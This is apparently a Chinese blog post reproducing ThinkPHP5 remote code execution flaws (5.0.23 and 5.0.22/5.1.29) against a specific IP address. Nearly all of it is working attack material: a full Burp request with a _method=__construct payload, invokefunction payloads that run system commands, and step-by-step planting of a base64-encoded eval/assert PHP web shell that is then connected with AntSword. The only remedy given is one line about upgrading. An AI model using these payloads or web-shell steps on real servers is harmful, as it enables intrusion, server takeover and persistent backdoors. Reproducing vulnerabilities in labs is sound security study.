1.1复现ThinkPHP5 5.0.23
(1)burpsuite抓包。
(2)send to repeater,执行命令:
POST /index.php?s=captcha HTTP/1.1
Host: 159.75.16.25:8089
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
(3)写入phpinfo:
`echo "<?php phpinfo(); ?>" > /var/www/public/info.php`
(4)查看是否写入:
ls%20-al
cat%20/var/www/public/info.php
(5)访问查看:http://159.75.16.25:8089/info.php
(6)上传shell:
echo%20"<?php%20@eval($_REQUEST['pass']);%20?>"%20>%20/var/www/public/pass.php
(7)查看:cat%20pass.php,发现被过滤了。
(8)内容base64编码:
echo%20-n%20YWFhPD9waHAgQGFzc2VydCgkX1JFUVVFU1RbJzEyMyddKTsgPz5iYmI=%20|%20base64%20-d>%20/var/www/public/pass.php
(9)查看:cat%20pass.php
(10)访问:http://159.75.16.25:8089/pass.php?123=phpinfo();
(11)蚁剑连接。
(12)右击选择文件管理。
1.2复现ThinkPHP5 5.0.22/5.1.29
(1)使用以下payload获取phpinfo:
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
(2)自行构造要执行的payload,获取网站目录文件:
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd
(3)写入文件:`echo "<?php phpinfo(); ?>" > /var/www/public/info.php`
访问查看:http://159.75.16.25:8087/info.php
(4)base64编码后上传shell:
echo%20-n%20YWFhPD9waHAgQGFzc2VydCgkX1JFUVVFU1RbJzEyMyddKTsgPz5iYmI=%20|%20base64%20-d>%20/var/www/public/pass.php
(5)访问:http://159.75.16.25:8087/pass.php?123=phpinfo();
(6)蚁剑连接。
(7)右击选择文件管理。
修复:升级ThinkPHP至安全版本。
758
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
